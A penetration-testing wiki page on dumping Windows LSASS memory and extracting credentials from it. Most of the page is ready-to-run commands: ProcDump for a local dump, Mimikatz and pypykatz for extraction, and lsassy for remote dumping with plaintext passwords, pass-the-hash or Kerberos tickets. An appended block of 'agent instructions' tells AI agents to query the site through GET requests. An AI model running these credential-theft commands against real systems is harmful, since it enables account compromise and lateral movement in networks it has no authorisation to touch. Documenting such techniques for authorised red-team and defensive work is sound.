# LSASS secrets

## Overview

In Windows, the Local Security Authority Subsystem Service (LSASS) is used to enforce security on the system. The LSASS service is used in various tasks, such as overseeing password changes and login, which means that credentials and hashes are stored within the memory for the LSASS process. With administrative rights, the credentials and hashes can be extracted.

## Local Dumping&#x20;

**Locally Dumping LSASS**

ProcDump is a Windows tool from the sysinternals package and can be used to dump the process memory for LSASS. Due to being a Windows tool, this may be a more legitmate method of dumping LSASS than infiltrating other unsigned attack tools.

* <https://learn.microsoft.com/en-us/sysinternals/downloads/procdump>

The following command will dump the LSASS memory to a .dmp file:

`procdump.exe -accepteula -ma lsass.exe lsass.dmp`

**Credential Extraction**

Once the lsass.dmp file has been gained and exfiltrated offline to an attack machine. Mimikatz or pypykatz can be used to extract the data.

* <https://github.com/gentilkiwi/mimikatz>
* <https://github.com/skelsec/pypykatz>

After opening **mimikatz** on the attack machine, the following command should be used:

`sekurlsa::minidump "lsass.dmp"`

`sekurlsa::logonpasswords`

After opening **pypykatz** on the attack machine, the following command should be used:

`pypykatz lsa minidump lsass.dmp`

## Remotely Dumping (With Credentials)

LSASS can be dumped **remotely** using lsassy, with local administrator credentials. lsassy is a project which ties together two other well known tools, impacket and pypykatz to gain data stored in LSASS .

* <https://github.com/login-securite/lsassy>

**Dump LSASS credentials with plaintext credentials**

`lsassy -d <domain> -u <user> -p <password> <target>`

**Dump LSASS credentials with pass-the-hash (NTLM)**

`lsassy -u <user> -H <NThash> <target>`

**Dump LSASS credentials with pass-the-ticket (Kerberos)**

* Requires an environment variable to be set, see [here](https://github.com/login-securite/lsassy/blob/master/Lsassy-Advanced-Usage#kerberos)

`lsassy -k <target>`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.pentestlist.com/offensive-security/internal-infrastructure/credential-discovery/lsass-secrets.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.